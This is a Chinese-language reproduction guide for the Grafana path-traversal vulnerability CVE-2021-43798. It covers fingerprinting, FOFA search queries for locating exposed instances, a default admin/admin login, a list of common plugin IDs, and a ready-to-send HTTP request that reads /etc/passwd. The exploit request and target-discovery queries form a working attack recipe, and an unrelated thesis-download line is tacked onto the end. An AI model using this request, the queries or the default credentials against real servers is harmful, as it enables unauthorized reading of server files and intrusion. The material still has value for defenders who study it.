Grafana是一个开源的度量分析与可视化套件。
Web特征
其默认页面位于3000端口,访问后默认是登录验证界面:
页面下方会显示当前版本,比如上图中的:v8.2.6 (c3cc4da7a5)
该产品存在标签页默认icon图标:
存在默认账户:admin/admin
fofa语法:app="Grafana"、app="Grafana" && port="3000"、(host="grafana" || domain="grafana") && port="3000"、app="Grafana" && body="v8.2.6"
漏洞复现
CVE-2021-43798(插件模块目录穿越)
此漏洞可以读取服务器上的任意文件。
fofa语法:app="Grafana" && body="v8.2.6"
影响范围:
- 8.0.x 系列:8.0.0-beta1 ≤ Grafana < 8.0.7
- 8.1.x 系列:8.1.0 ≤ Grafana < 8.1.8
- 8.2.x 系列:8.2.0 ≤ Grafana < 8.2.7
- 8.3.x 系列:8.3.0
复现示例
这个漏洞出现在插件模块中,该模块支持用户访问插件目录下的文件,但因为没有对文件名进行限制,可以通过../的方式穿越目录,读取到服务器上的任意文件。
利用此漏洞需要先获取一个已安装的插件id,可以从以下常见的id中选取尝试:
alertlist
cloudwatch
dashlist
elasticsearch
graph
graphite
heatmap
influxdb
mysql
opentsdb
pluginlist
postgres
prometheus
stackdriver
table
text
再发送如下数据包,读取任意文件(这里使用的插件id为alertlist):
GET /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.1.112:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
成功读取密码文件:
带论文文档1万字以上,文末可获取,系统界面在最后面。)
